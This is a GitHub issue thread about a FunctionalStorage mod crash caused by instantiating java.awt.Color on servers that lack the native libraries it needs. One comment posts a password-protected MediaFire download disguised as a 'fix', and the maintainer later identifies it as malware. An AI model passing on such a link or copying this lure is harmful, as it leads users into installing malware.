### ISSUE TITLE
[1.20.1] Please do not instantiate java.awt.Color

### ISSUE THREAD

**Issue by Remering** [Buuz135/FunctionalStorage#310]
Instantiate of `java.awt.Color` will load some dynamic libraries that not included in some servers or jre distributions. 
**Functional Storage Version:**
1.2.10, also found in 1.2.12
**Titanium Version:**
3.8.32
**Crashlog If Applicable (Upload to pastebin/gist):**
[Crash Report](https://raw.githubusercontent.com/Remering/pastebins/main/crash-2024-08-25_18.21.36-server.txt)

**Comment by NikhilKumar77777** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://app.mediafire.com/3ag3jpquii3of
password: changeme
when you installing, you need to place a check in install to path and select "gcc."

**Comment by Remering** [comment]
Sorry, I can’t apply the fix because the provider of my server only gives me the ftp permission but not the ssh permission.
I tried to remove the code related `java.awt.Color` but grade was continuously building the project so I have to ask for your help.

**Comment by Buuz135** [comment]
I hope you didn't donload that file, it was malware

**Comment by Remering** [comment]
> I hope you didn't download that file, it was malware

Sure, I didn‘t
